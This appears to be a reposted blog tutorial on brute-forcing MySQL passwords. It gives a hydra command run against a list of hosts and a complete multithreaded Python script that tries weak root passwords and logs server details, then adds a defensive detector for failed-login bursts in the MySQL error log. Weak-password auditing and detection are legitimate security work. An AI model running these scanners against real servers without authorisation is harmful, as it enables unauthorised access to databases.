Brute-forcing MySQL passwords
Published: 2019-04-29


How to automatically check MySQL servers for weak passwords: two approaches are introduced here.

1. hydra

hydra is a password brute-forcing tool that ships with Kali Linux.

hydra usage help:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPLv3.0.
The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

For wordlists you can use the ones that ship with Kali under /usr/share/wordlists/, or refer to other wordlist collections.
Use the command below to brute-force MySQL servers, where 3306_ips.txt is the list of MySQL server IP addresses and user.txt and password.txt are the username and password dictionaries. -q suppresses connection error messages, -f stops attacking a host as soon as one valid password is found for it, and -o writes the results to a file.

hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql

Result:

[Figure: hydra brute-force results against MySQL]

See also:

2. Brute-forcing MySQL with Python

Use Python's MySQL client library to connect to MySQL and try the passwords.

For connecting to a MySQL database from Python, see:
The code is as follows.
brute_mysql.py

#-*- coding:utf-8 -*-
# author:wlj
# time:2020/2/29 22:20
# Brute-force MySQL database passwords with Python
import mysql.connector
import threading
import queue

task_queue = queue.Queue()
# password dictionary
weak_pwd_list = ['root', '123456', '12345', 'mysql', '111111', '12345678']
# mutex guarding thread access to task_queue
threadLock = threading.Lock()

def test(ip):
    for password in weak_pwd_list:
        try:
            # connect to the database
            conn = mysql.connector.connect(host=ip, user='root', password=password, database='mysql', port=3306)
            cursor = conn.cursor()
            sql = 'SELECT @@global.basedir,@@global.general_log_file,@@global.version,@@global.version_compile_os,@@global.secure_file_priv;'
            cursor.execute(sql)
            basedir, general_log_file, version, version_compile_os, secure_file_priv = [str(x) for x in cursor.fetchone()]
            #print(basedir, general_log_file, version, version_compile_os, secure_file_priv)
            cursor.close()  # close the database connection
            conn.close()
            print('%s,%s,%s' % (ip, 'root', password))
            format_str = '%s,' * 8 + '\n'
            # append the result to the CSV file
            with open('mysql_weak_pwd.csv', 'a') as f:
                f.write(format_str % (ip, 'root', password, basedir, general_log_file, version, version_compile_os, secure_file_priv))
            return
        except Exception:
            # wrong password or connection failure: try the next password
            continue

def brute_mysql():
    global task_queue
    while True:
        # acquire the lock for thread synchronization
        threadLock.acquire()
        if task_queue.empty():
            threadLock.release()
            return
        ip = task_queue.get()
        threadLock.release()
        test(ip)

def main():
    with open('3306_ips.txt', 'r') as f:
        ip_list = f.read().split('\n')
    with open('mysql_weak_pwd.csv', 'w') as f:
        f.write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n')
    for ip in ip_list:
        ip = ip.strip()
        if ip:
            task_queue.put(ip)
    threads = []
    for i in range(0, 200):
        t = threading.Thread(target=brute_mysql)
        t.start()
        threads.append(t)
    for t in threads:
        t.join()

main()

Result:

[Figure: Python scan results]
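Both scanners above leave the same footprint on the server: a burst of "Access denied for user" entries in the MySQL error log from one source host. As an added example (not part of the original post or either tool), here is a small detector for that pattern: it parses the error-log lines and flags any source that accumulates a threshold of denials inside a sliding time window. The log lines are constructed samples in the MySQL 5.7 layout, plus one in the MySQL 8 layout with its extra bracketed fields; the regex, threshold and window size are my own choices. One caveat a practitioner needs: MySQL only writes these Note-level entries when log_error_verbosity is 3 (log_warnings greater than 1 on older 5.6 servers), so check that setting before relying on this signal.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample error-log lines (not real data). The first seven follow the
# MySQL 5.7 format; the last follows the MySQL 8 format, which inserts error-code
# and subsystem fields between "[Note]" and the message text.
SAMPLE_LOG = """\
2019-04-29T10:00:01.000001Z 10 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2019-04-29T10:00:01.200001Z 11 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2019-04-29T10:00:01.400001Z 12 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2019-04-29T10:00:01.600001Z 13 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2019-04-29T10:00:01.800001Z 14 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2019-04-29T10:00:02.000001Z 15 [Note] Access denied for user 'root'@'10.0.0.5' (using password: NO)
2019-04-29T10:05:00.000001Z 20 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
2019-04-29T10:30:00.000001Z 21 [Note] [MY-010926] [Server] Access denied for user 'app'@'10.0.0.9' (using password: YES)
"""

# Matches the "Access denied" line in both layouts above. The optional group
# swallows any extra bracketed fields such as [MY-010926] [Server].
DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z)\s+\d+\s+\[\w+\]"
    r"(?:\s+\[[^\]]+\])*\s+Access denied for user '(?P<user>[^']*)'@'(?P<source>[^']*)'"
)


def parse_denied(line):
    """Return {'ts', 'user', 'source'} for an Access-denied line, else None."""
    m = DENIED_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ"),
        "user": m.group("user"),
        "source": m.group("source"),
    }


def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag source hosts with >= threshold denials inside any sliding window.

    Returns {source: {'failures': total denials seen, 'users': sorted usernames
    tried, 'first': first timestamp, 'last': last timestamp}} for flagged
    sources only. Threshold and window are assumed values; tune them to the
    login rate that is normal for the server being monitored.
    """
    events = defaultdict(list)
    for line in lines:
        ev = parse_denied(line)
        if ev:
            events[ev["source"]].append(ev)

    hits = {}
    for source, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        recent = deque()  # timestamps inside the current window
        flagged = False
        for ev in evs:
            recent.append(ev["ts"])
            # drop timestamps that have fallen out of the window
            while ev["ts"] - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                flagged = True
                break
        if flagged:
            hits[source] = {
                "failures": len(evs),
                "users": sorted({e["user"] for e in evs}),
                "first": evs[0]["ts"],
                "last": evs[-1]["ts"],
            }
    return hits


if __name__ == "__main__":
    for src, info in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['failures']} denials, users={info['users']}, "
              f"{info['first']} .. {info['last']}")
```

On the sample data only 10.0.0.5 is flagged: six denials in two seconds, all against root, which is exactly what a dictionary run with the list above produces. The two denials from 10.0.0.9 are 25 minutes apart and stay below the window threshold, so a single mistyped password does not raise an alert. Reading the whole file into memory is fine for a one-off check; for continuous monitoring feed the same functions from a tailing reader.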

Reprinted from: http://mrqlf.baihongyu.com/
